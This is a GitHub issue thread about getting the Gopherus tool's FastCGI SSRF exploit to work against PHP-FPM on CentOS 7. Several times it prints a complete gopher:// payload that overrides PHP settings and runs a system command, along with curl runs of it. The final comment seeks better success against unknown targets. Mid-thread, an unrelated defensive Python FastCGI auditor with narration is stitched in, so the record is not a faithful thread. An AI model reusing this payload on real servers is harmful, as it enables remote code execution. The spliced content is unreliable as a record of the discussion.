fastcgi exploit not executing successfully - CentOS 7 #5

Closed
mpchadwick opened this Issue Jan 30, 2019 · 9 comments

mpchadwick commented Jan 30, 2019

Hi,

I've been testing the fastcgi exploit in a local VM but am unable to get it to work.

PHP-FPM is listening on port 9000

[vagrant@localhost ~]$ netstat -tunapl | grep 9000
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:56488         127.0.0.1:9000          TIME_WAIT   -

[vagrant@localhost ~]$ sudo grep -ri listen /etc/php-fpm.d/www.conf
; - 'listen' (unixsocket)
;   'ip.add.re.ss:port'    - to listen on a TCP socket to a specific address on
;   'port'                 - to listen on a TCP socket to all addresses on a
;   '/path/to/unix/socket' - to listen on a unix socket.
listen = 127.0.0.1:9000
; Set listen(2) backlog.
;listen.backlog = 128
;listen.owner = nobody
listen.owner = apache
;listen.group = nobody
listen.group = apache
listen.mode = 0660
; PHP FCGI (5.2.2+). Makes sense only with a tcp listening socket. Each address
listen.allowed_clients = 127.0.0.1
;   listen queue         - the number of request in the queue of pending
;                          connections (see backlog in listen(2));
;   max listen queue     - the maximum number of requests in the queue
;   listen queue len     - the size of the socket queue of pending connections;
;   listen queue:         0
;   max listen queue:     1
;   listen queue len:     42

I've generated the payload and executed it as follows:

[vagrant@localhost Gopherus]$ pwd
/home/vagrant/Gopherus
[vagrant@localhost Gopherus]$ cat index.php
<?php

echo 'HELLO WORLD' . PHP_EOL;
[vagrant@localhost Gopherus]$ gopherus --exploit fastcgi


  ________              .__
 /  _____/  ____ ______ |  |__   ___________ __ __  ______
/   \  ___ /  _ \\____ \|  |  \_/ __ \_  __ \  |  \/  ___/
\    \_\  (  <_> )  |_> >   Y  \  ___/|  | \/  |  /\___ \
 \______  /\____/|   __/|___|  /\___  >__|  |____//____  >
        \/       |__|        \/     \/                 \/

        author: $_SpyD3r_$

Give one file name which should be surely present in the server (prefer .php file)
if you don't know press ENTER we have default one:  /home/vagrant/Gopherus/index.php
Terminal command to run:  ls

Your gopher link is ready to do SSRF:

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0D%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%20SCRIPT_FILENAME/home/vagrant/Gopherus/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

-----------Made-by-SpyD3r-----------
[vagrant@localhost Gopherus]$ curl -v gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0D%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%20SCRIPT_FILENAME/home/vagrant/Gopherus/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
* About to connect() to 127.0.0.1 port 9000 (#0)
*   Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 9000 (#0)

curl just hangs until I eventually send it a SIGINT.

Any help would be much appreciated.

mpchadwick commented Jan 30, 2019

I used tcpdump to capture the activity with the curl and compared it to a tcpdump when accessing a webpage in Wireshark. It seems the packets are not being considered properly formed fastcgi. On the page that's working the 4th packet shows in Wireshark as "FCGI_BEGIN_REQUEST", however when sending the payload generated here it says "TCP segment of a reassembled PDU"

[image]

tarunkant commented Jan 30, 2019

Hey, I think it's a problem with your FastCGI installation, because it's working fine for me (also try with the default file I added). Also, can you try telnet 127.0.0.1 9000 and see if it gets connected?
[image]

mpchadwick commented Jan 30, 2019

Telnet connects fine.

[vagrant@localhost ~]$ telnet 127.0.0.1 9000
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Connection closed by foreign host.

I'm thinking it may actually be an issue with the cURL version I'm using. I looked at the TCP packet in Wireshark more closely and found that it only contains the 01 01 of the FCGI_BEGIN_REQUEST and then gets cut off (you'll notice the length is 68 for the curl request that isn't working, whereas it's 82 when I have the request delivered via Apache mod_proxy_fcgi). It seems like curl is not delivering the TCP packets to fastcgi as expected.

Out of curiosity, which Linux distro / curl version are you testing on?

Here are the specs of where I'm testing:

[vagrant@localhost ~]$ cat /etc/*release*
CentOS Linux release 7.3.1611 (Core)
Derived from Red Hat Enterprise Linux 7.3 (Source)
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"

CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"

CentOS Linux release 7.3.1611 (Core)
CentOS Linux release 7.3.1611 (Core)
cpe:/o:centos:centos:7
[vagrant@localhost ~]$ uname -r
3.10.0-514.el7.x86_64
[vagrant@localhost ~]$ curl --version
curl 7.29.0 (x86_64-redhat-linux-gnu) libcurl/7.29.0 NSS/3.36 zlib/1.2.7 libidn/1.28 libssh2/1.4.3
Protocols: dict file ftp ftps gopher http https imap imaps ldap ldaps pop3 pop3s rtsp scp sftp smtp smtps telnet tftp
Features: AsynchDNS GSS-Negotiate IDN IPv6 Largefile NTLM NTLM_WB SSL libz unix-sockets
[vagrant@localhost ~]$ sudo yum info curl
Loaded plugins: fastestmirror
http://repo.varnish-cache.org/redhat/varnish-4.1/el7/repodata/repomd.xml: [Errno 14] HTTPS Error 404 - Not Found
Trying other mirror.
To address this issue please refer to the below knowledge base article

https://access.redhat.com/articles/1320623

If above article doesn't help to resolve this issue please create a bug on https://bugs.centos.org/

Loading mirror speeds from cached hostfile
 * base: centos-distro.cavecreek.net
 * epel: mirror.team-cymru.com
 * extras: mirror.net.cen.ct.gov
 * ius: mirror.its.dal.ca
 * updates: ftpmirror.your.org
Installed Packages
Name        : curl
Arch        : x86_64
Version     : 7.29.0
Release     : 51.el7
Size        : 528 k
Repo        : installed
From repo   : base
Summary     : A utility for getting files from remote servers (FTP, HTTP, and others)
URL         : http://curl.haxx.se/
License     : MIT
Description : curl is a command line tool for transferring data with URL syntax, supporting
            : FTP, FTPS, HTTP, HTTPS, SCP, SFTP, TFTP, TELNET, DICT, LDAP, LDAPS, FILE, IMAP,
            : SMTP, POP3 and RTSP.  curl supports SSL certificates, HTTP POST, HTTP PUT, FTP
            : uploading, HTTP form based upload, proxies, cookies, user+password
            : authentication (Basic, Digest, NTLM, Negotiate, kerberos...), file transfer
            : resume, proxy tunneling and a busload of other useful tricks.

[vagrant@localhost ~]$
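The two observations above (Wireshark dissecting the working request as FCGI_BEGIN_REQUEST but the failing one only as "TCP segment of a reassembled PDU", and the capture stopping after the first two bytes of the record) come down to FastCGI record framing: each 8-byte header promises a contentLength and paddingLength, and a stream that ends before those bytes arrive is not a FastCGI request at all. The following is an added example, not Gopherus code and not something either participant posted. It parses a raw FastCGI byte stream record by record, reports exactly where framing breaks, decodes the PARAMS pairs, and flags a client-supplied PHP_VALUE / PHP_ADMIN_VALUE (the ini override that only the fronting web server should ever be setting). The sample bytes, the path /var/www/index.php and all function names are constructed for this example.

```python
# Added example: parse and audit a raw FastCGI stream from the defender's side.
# Not Gopherus code; sample bytes and /var/www/index.php are constructed.
import struct
from dataclasses import dataclass

FCGI_HEADER_LEN = 8
FCGI_TYPES = {1: "BEGIN_REQUEST", 3: "END_REQUEST", 4: "PARAMS", 5: "STDIN",
              6: "STDOUT", 7: "STDERR"}
# Params the upstream web server must never forward from a client, and the
# ini directives inside them that a defender most wants to see flagged.
SENSITIVE_PARAMS = ("PHP_VALUE", "PHP_ADMIN_VALUE")
RISKY_DIRECTIVES = ("auto_prepend_file", "auto_append_file", "allow_url_include",
                    "disable_functions", "open_basedir")


@dataclass
class Record:
    type: int
    request_id: int
    body: bytes


def parse_records(data: bytes):
    """Split data into FastCGI records. Returns (records, error); error is None
    only when every header's contentLength + paddingLength is actually present."""
    records, off = [], 0
    while off < len(data):
        if len(data) - off < FCGI_HEADER_LEN:
            return records, f"truncated header at offset {off}: {len(data) - off} of {FCGI_HEADER_LEN} bytes"
        version, rtype, req_id, clen, plen, _ = struct.unpack("!BBHHBB", data[off:off + FCGI_HEADER_LEN])
        if version != 1:
            return records, f"unsupported FastCGI version {version} at offset {off}"
        have = len(data) - off - FCGI_HEADER_LEN
        if have < clen + plen:
            return records, (f"truncated {FCGI_TYPES.get(rtype, rtype)} record at offset {off}: "
                             f"header promises {clen}+{plen} bytes, {have} present")
        start = off + FCGI_HEADER_LEN
        records.append(Record(rtype, req_id, data[start:start + clen]))
        off = start + clen + plen
    return records, None


def parse_params(body: bytes) -> dict:
    """Decode FCGI_PARAMS name-value pairs: a length is 1 byte if < 128,
    otherwise 4 bytes big-endian with the high bit cleared."""
    params, i = {}, 0

    def read_len() -> int:
        nonlocal i
        if body[i] < 0x80:
            i += 1
            return body[i - 1]
        (n,) = struct.unpack("!I", body[i:i + 4])
        i += 4
        return n & 0x7FFFFFFF

    while i < len(body):
        nlen, vlen = read_len(), read_len()
        if i + nlen + vlen > len(body):
            raise ValueError(f"param at offset {i} overruns record body")
        name = body[i:i + nlen].decode("latin-1")
        params[name] = body[i + nlen:i + nlen + vlen].decode("latin-1")
        i += nlen + vlen
    return params


def audit_stream(data: bytes):
    """Return (params, findings): framing problems plus client-supplied ini overrides."""
    findings = []
    records, err = parse_records(data)
    if err:
        findings.append("MALFORMED: " + err)
    if not records or records[0].type != 1:
        findings.append("stream does not start with FCGI_BEGIN_REQUEST")
    params = {}
    for rec in records:
        if rec.type == 4 and rec.body:  # an empty PARAMS record just ends the list
            params.update(parse_params(rec.body))
    for name in SENSITIVE_PARAMS:
        if name in params:
            hits = [d for d in RISKY_DIRECTIVES if d in params[name]]
            findings.append(f"{name} supplied by client" + (f" touching {', '.join(hits)}" if hits else ""))
    return params, findings


# Constructed sample: one complete RESPONDER request that carries a PHP_VALUE override.
SAMPLE_OK = (
    b"\x01\x01\x00\x01\x00\x08\x00\x00"  # BEGIN_REQUEST, request id 1, 8-byte body
    b"\x00\x01\x00\x00\x00\x00\x00\x00"  # role RESPONDER, flags 0
    b"\x01\x04\x00\x01\x00\x5e\x02\x00"  # PARAMS, 94-byte body, 2 bytes padding
    b"\x0f\x12SCRIPT_FILENAME/var/www/index.php"
    b"\x0e\x03REQUEST_METHODGET"
    b"\x09\x1dPHP_VALUEauto_prepend_file=php://input"
    b"\x00\x00"                          # padding
    b"\x01\x04\x00\x01\x00\x00\x00\x00"  # empty PARAMS: end of params
    b"\x01\x05\x00\x01\x00\x00\x00\x00"  # empty STDIN: end of request
)
SAMPLE_CUT = SAMPLE_OK[:40]              # same stream cut mid-PARAMS, as a short write leaves it

if __name__ == "__main__":
    for label, blob in (("complete", SAMPLE_OK), ("truncated", SAMPLE_CUT)):
        print(label, *audit_stream(blob))
```

Run it on the complete sample and the only finding is the client-supplied PHP_VALUE touching auto_prepend_file; run it on the cut sample and the first finding is the framing error at offset 16, where the PARAMS header promises 94+2 bytes and only 16 are present. That second case is what a protocol dissector has to give up on, and it is the same symptom as the 68-byte capture above: PHP-FPM sits waiting for the rest of the record, and the client sees a hang rather than a response. Because the FastCGI request in this thread arrives from 127.0.0.1, a listen.allowed_clients filter like the one in the www.conf above does not distinguish it from the real web server; inspecting the params themselves, as this audit does, is what separates the two.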
tarunkant commented Jan 30, 2019

Hey, here are my specs:
[image]

@mpchadwick mpchadwick changed the title fastcgi exploit not executing successfully fastcgi exploit not executing successfully - CentOS 7 Jan 31, 2019

mpchadwick commented Jan 31, 2019

Payload worked on my Mac, so it definitely seems to be an issue with the CentOS environment I was testing in / the version of cURL.

curl -v gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0D%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%20SCRIPT_FILENAME/home/vagrant/Gopherus/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 9000 (#0)
Primary script unknown
kStatus: 404 Not Found
X-Powered-By: PHP/7.1.24
Content-type: text/html; charset=UTF-8

File not found.
* Closing connection 0
-ee%

I've changed the title of the issue to note that it seems to be specific to CentOS (7) and curl that comes with CentOS 7. Not sure if you want to keep this issue open or not?

tarunkant commented Jan 31, 2019

I didn't try with CentOS; I will look into the problem.
Leaving it open for now.
Can you try upgrading your curl and let me know if it works?

mpchadwick commented Jan 31, 2019

It works after upgrading curl with these instructions:

https://qiita.com/tkprof/items/5460b8d603cbbc542c8c

[vagrant@localhost Gopherus]$ curl gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0D%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%20SCRIPT_FILENAME/home/vagrant/Gopherus/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00 --output -
Primary script unknown
kStatus: 404 Not Found
X-Powered-By: PHP/7.0.17
Content-type: text/html; charset=UTF-8

File not found.

tarunkant commented Feb 1, 2019

Great, then I think we can close this issue.

@tarunkant tarunkant closed this Feb 4, 2019

mpchadwick commented Feb 5, 2019

I'm not sure if it's possible, but I think it would be interesting to see if there was a way to send a valid payload for CentOS 7 (and 6)'s out-of-box curl. That would help improve the success rate against an unknown target.
